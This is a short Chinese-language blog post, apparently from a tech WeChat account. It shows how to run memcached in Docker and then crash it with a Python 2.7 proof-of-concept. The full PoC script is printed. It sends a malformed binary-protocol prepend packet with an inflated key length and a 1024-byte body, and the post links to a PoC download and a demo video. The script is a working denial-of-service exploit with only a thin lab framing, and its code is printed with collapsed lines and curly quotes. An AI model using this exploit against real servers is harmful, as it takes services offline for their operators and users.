摘要
用docker启动memcached容器,成功运行后,我们执行poc,让它成为我们的“奴隶”。
正文
【摘要】dockerimages//列出镜像dockerrun-d-p11211:11211af1336632a51//启动容器dockerps//查看容器是否运行ok运行成功下面我们执行poc,使得memac…
docker images //列出镜像docker run -d -p 11211:11211 af1336632a51 //启动容器docker ps //查看容器是否运行ok运行成功下面我们执行poc,使得memached停止运行python2.7 poc.py 127.0.0.1 11211 //执行POCdocker ps
简单解释一下,具体参考视频
poc下载:https://pan.lanzou.com/i04t5kd
百度视频观看地址:链接: https://pan.baidu.com/s/1nv42Q9r 密码: at6h
优酷在线地址:http://v.youku.com/v_show/id_XMzE0NjcwNjg4NA==.html
# -*- coding: utf-8 -*-import structimport socketimport sysMEMCACHED_REQUEST_MAGIC = “\x80″OPCODE_PREPEND_Q = “\x1a”key_len = struct.pack(“!H”, 0xfa)extra_len = “\x00″data_type = “\x00″vbucket = “\x00\x00″body_len = struct.pack(“!I”, 0)opaque = struct.pack(“!I”, 0)CAS = struct.pack(“!Q”, 0)body = “A” * 1024if len(sys.argv) != 3: print “./poc_crash.py <server> <port>” sys.exit(1)packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_lenpacket += data_type + vbucket + body_len + opaque + CASpacket += bodyset_packet = “set testkey 0 60 4\r\ntest\r\n”get_packet = “get testkey\r\n”s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s1.connect((sys.argv[1], int(sys.argv[2])))s1.sendall(set_packet)print s1.recv(1024)s1.close()s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s2.connect((sys.argv[1], int(sys.argv[2])))s2.sendall(packet)print s2.recv(1024)s2.close()s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s3.connect((sys.argv[1], int(sys.argv[2])))s3.sendall(get_packet)s3.recv(1024)s3.close()
关注不迷路
扫码下方二维码,关注宇凡盒子公众号,免费获取最新技术内幕!
评论0